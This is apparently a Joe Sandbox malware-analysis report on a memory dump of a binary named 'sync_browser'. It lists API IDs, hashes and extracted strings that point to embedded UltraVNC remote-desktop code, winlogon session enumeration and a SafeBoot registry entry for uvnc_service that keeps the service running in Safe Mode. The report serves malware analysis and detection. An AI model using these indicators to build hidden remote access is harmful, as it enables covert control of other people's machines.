                                                                      • Opcode ID: 0a56b58438f5393381c87e283caa4a4dd7c9b87ade4efda876708c0d747ae0c3
                                                                      • Instruction ID: 5cf5a66d5806c2d45dafde14d4c80a8eb074e47a3950fecf70d18385e785d158
                                                                      • Opcode Fuzzy Hash: 0a56b58438f5393381c87e283caa4a4dd7c9b87ade4efda876708c0d747ae0c3
                                                                      • Instruction Fuzzy Hash: BC417C76608A8A82DA60EB16F4A496EB720FBC5FD4F805122EE4E87768DF3CD545C710
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: sprintf$CriticalInitializeSection$_errno_invalid_parameter_noinfo
                                                                      • String ID: 0.0.0$12-12-2002$Plugin.dsm$Someone$Unknown
                                                                      • API String ID: 524037307-261918508
                                                                      • Opcode ID: 4e3ff866f97a8194c4c278236100d924ee412cec83e3f0554b4225ebfdf1fe97
                                                                      • Instruction ID: 1d7e8d07b2937b4e61ccd052a26edc5f5de4e6923c185b04c89d72c4afdf424a
                                                                      • Opcode Fuzzy Hash: 4e3ff866f97a8194c4c278236100d924ee412cec83e3f0554b4225ebfdf1fe97
                                                                      • Instruction Fuzzy Hash: BB21DF76504B8691DB01EF24F9903E9B3ACFF54F88F885136DA4C4A6ADDF389295C321
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close$DesktopHandle$CriticalInputLeaveOpenSection
                                                                      • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                      • API String ID: 4065787043-3977938048
                                                                      • Opcode ID: 246573e72b9e964606911253f6d16abd29567e0b63f4d66f188770489fa65682
                                                                      • Instruction ID: 4ba29b6e2292a860b6d29a1f1c466ab0f7ca9d267332911be869be9a8ecf12b3
                                                                      • Opcode Fuzzy Hash: 246573e72b9e964606911253f6d16abd29567e0b63f4d66f188770489fa65682
                                                                      • Instruction Fuzzy Hash: 96E1C6326086C585E750AB39C4687BEA7A1FBC5F64F844236DA5C877E9CF38D440C722
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Desktop$CloseInputOpen
                                                                      • String ID: disabled$enabled$vncclient.cpp : rfbSetServerInput: inputs %s$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                      • API String ID: 1367241101-2270697846
                                                                      • Opcode ID: 1b183829833fec8f16a716ecdcb68095327f5337e21e681376bb5099e03e3359
                                                                      • Instruction ID: 0fbbcd557d01018afb62f34842c3588b9bd018e6eabd73fd84865fd5593302fc
                                                                      • Opcode Fuzzy Hash: 1b183829833fec8f16a716ecdcb68095327f5337e21e681376bb5099e03e3359
                                                                      • Instruction Fuzzy Hash: 91D1A422A086C585E751AB39C4687FDABA1FBC5F54F894032EA4C877A9CF38D445C722
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadProc
                                                                      • String ID: WTSEnumerateProcessesA$WTSFreeMemory$winlogon.exe$wtsapi32
                                                                      • API String ID: 145871493-4162899161
                                                                      • Opcode ID: 0adbf5e9dd7c30560f15780b9e5a176f1c63490ee2f09b9478d032169a347fac
                                                                      • Instruction ID: c8a94a4f26c618f608bbc749e7b83b0e3ff3db0ee86c6271d1176f29d2cdafa8
                                                                      • Opcode Fuzzy Hash: 0adbf5e9dd7c30560f15780b9e5a176f1c63490ee2f09b9478d032169a347fac
                                                                      • Instruction Fuzzy Hash: EA41B332609B8A86E660AF15F4503A9B3A0FF85FA0F884136DD5D87754EF3CD445C711
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadProc
                                                                      • String ID: Console$WTSEnumerateSessionsA$WTSFreeMemory$wtsapi32
                                                                      • API String ID: 145871493-4083478734
                                                                      • Opcode ID: 6cf080f84c71be26cb1bfa4edcfbd06d998d32083e0e310b716d811f44676067
                                                                      • Instruction ID: 3c47889d69afb3679f0cb89fe9edb1640297d864fc6453271283abdd115835c4
                                                                      • Opcode Fuzzy Hash: 6cf080f84c71be26cb1bfa4edcfbd06d998d32083e0e310b716d811f44676067
                                                                      • Instruction Fuzzy Hash: C1418121A09B4B86E660EF25F86076AE2A0FF45F90F880136D95D87394EF3CE454C721
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ThreadWindow$CloseCurrentEventHandleMessageObjectOpenPostPrioritySingleSleepWait
                                                                      • String ID: VncEvent
                                                                      • API String ID: 2428488660-2681191898
                                                                      • Opcode ID: 78b1a00b88fe3fbd3304328edc48d2619275dfc3e1a6d7d438e00feda673ce81
                                                                      • Instruction ID: 741e80d9c7f19a776e0cb444c5d83ce28240ec347c0870d8f285a77855b65c36
                                                                      • Opcode Fuzzy Hash: 78b1a00b88fe3fbd3304328edc48d2619275dfc3e1a6d7d438e00feda673ce81
                                                                      • Instruction Fuzzy Hash: A8118620F0C64E42FB65BB31BA7877D9291AF89F85F886032D90E86654EE3C94448732
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalInitializeSection$AddressProc$LibraryLoad
                                                                      • String ID: GetPerTcpConnectionEStats$Iphlpapi.dll$SetPerTcpConnectionEStats$vsocket.cpp : VSocket() m_pDSMPlugin = NULL
                                                                      • API String ID: 3015439405-2946900448
                                                                      • Opcode ID: b5c9a895933125692294ff2e15cdf7522bd1a19dbcf515155b618464db81f3f7
                                                                      • Instruction ID: 747768075b774ac4a0e062906af0bc2101245b70bd720dcaa461dc92e9c17d81
                                                                      • Opcode Fuzzy Hash: b5c9a895933125692294ff2e15cdf7522bd1a19dbcf515155b618464db81f3f7
                                                                      • Instruction Fuzzy Hash: 8E214C76914B8A81EB10EF24F8642A873A4FB04F09F845136CE5D97368EF7CD558C762
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: free$_errno$EnvironmentVariable__wtomb_environ_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 101574016-0
                                                                      • Opcode ID: 181369242843f9036f05e592b74b1e6aafa5b20a9f3d11d8321f47b8ab448537
                                                                      • Instruction ID: b5bf741bbd763da0366ec58b36f8919d9485c8406a5cfaa794dfc8d2abcc82c7
                                                                      • Opcode Fuzzy Hash: 181369242843f9036f05e592b74b1e6aafa5b20a9f3d11d8321f47b8ab448537
                                                                      • Instruction Fuzzy Hash: 6CA1A062E0974A81FA11BB15B930779A294AF40FD4F868536DD5D8BB8DDF3CE8418322
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _errno$FullNamePathfree$ErrorLast_invalid_parameter_noinfocalloc
                                                                      • String ID:
                                                                      • API String ID: 3219262609-0
                                                                      • Opcode ID: bfbee9e4b5986560eceb10190c14978969bf0a457ba4f53162cbca2fe3e34832
                                                                      • Instruction ID: e8df9e513a76513a5fd79b32715d06061281f24ece9ef9460cbf1d838b4819d3
                                                                      • Opcode Fuzzy Hash: bfbee9e4b5986560eceb10190c14978969bf0a457ba4f53162cbca2fe3e34832
                                                                      • Instruction Fuzzy Hash: 8831A061A0E28B95FA51BB61747037DA190AF45F90F994433E95EC7BCEEE3CA4018322
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$AddressProc$Initialize$FileHandleLibraryLoadModule$CountCreateEnterErrorLastLeaveMappingOpenSemaphoreTickView
                                                                      • String ID: ChangeWindowMessageFilter$GetCursorInfo$user32.dll
                                                                      • API String ID: 173432231-678763868
                                                                      • Opcode ID: faf61d6d44ca246d6e556e1dfbdb385b5274f0d62226512dde9a94f323da9ec3
                                                                      • Instruction ID: 517bd0a940e9050cb91481739263b9e17871deac419213723aa8336020dcba2b
                                                                      • Opcode Fuzzy Hash: faf61d6d44ca246d6e556e1dfbdb385b5274f0d62226512dde9a94f323da9ec3
                                                                      • Instruction Fuzzy Hash: C5412132619B45A2E748EB24F9503E9B3A8FB44B54F800136D7AD83794DF7CA4B5C712
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID: LANMANNT$LANSECNT$ProductType$SERVERNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                      • API String ID: 3677997916-356703426
                                                                      • Opcode ID: 88216def6c21df696fe551fc804dfdd3315c8a7ded965229e51908db5a4eccae
                                                                      • Instruction ID: 6aaf2c8f6f34ef66aef31583951b4eb36e827eb03b82efdafbab9690856cc9ca
                                                                      • Opcode Fuzzy Hash: 88216def6c21df696fe551fc804dfdd3315c8a7ded965229e51908db5a4eccae
                                                                      • Instruction Fuzzy Hash: 14415131A1864B81EB20AB25F4603BAB3A0FB45B88FC01033EA4EC655DEF3CD555CB61
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID: CurrentType$Multiprocessor Checked$Multiprocessor Free$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Uniprocessor Checked$Uniprocessor Free
                                                                      • API String ID: 3677997916-1370392681
                                                                      • Opcode ID: 127efd2f4bb2d730ad2ffcadb57483ca5e65c2607e8512af785212c1471c3a0c
                                                                      • Instruction ID: 5a05037cd1d2859f57672c62f22b79ec1982cc117f54915ed71e2b5c7440a51d
                                                                      • Opcode Fuzzy Hash: 127efd2f4bb2d730ad2ffcadb57483ca5e65c2607e8512af785212c1471c3a0c
                                                                      • Instruction Fuzzy Hash: D1314071A1864B81FB10AB21F4647BAB364FB45B48FC01133EA8EC65ADEF3CD5058B51
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
Similarity
• API ID: Create$BitmapCompatibleDeleteErrorLastObjectSection
• String ID: vncdesktop.cpp : attempting to enable DIBsection blits$vncdesktop.cpp : enabled fast DIBsection blits OK$vncdesktop.cpp : enabled slow blits OK$vncdesktop.cpp : failed to build DIB section - reverting to slow blits$vncdesktop.cpp : failed to create memory bitmap(%d)
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
Similarity
• API ID: CloseCreateValue_errno_invalid_parameter_noinfo_snprintf
• String ID: ?$Network$SYSTEM\CurrentControlSet\Control\SafeBoot\%s\%s$Service$uvnc_service
Strings
• vncdesktopsink.cpp : initwindowthread already closed , xrefs: 00007FF7E50A3246
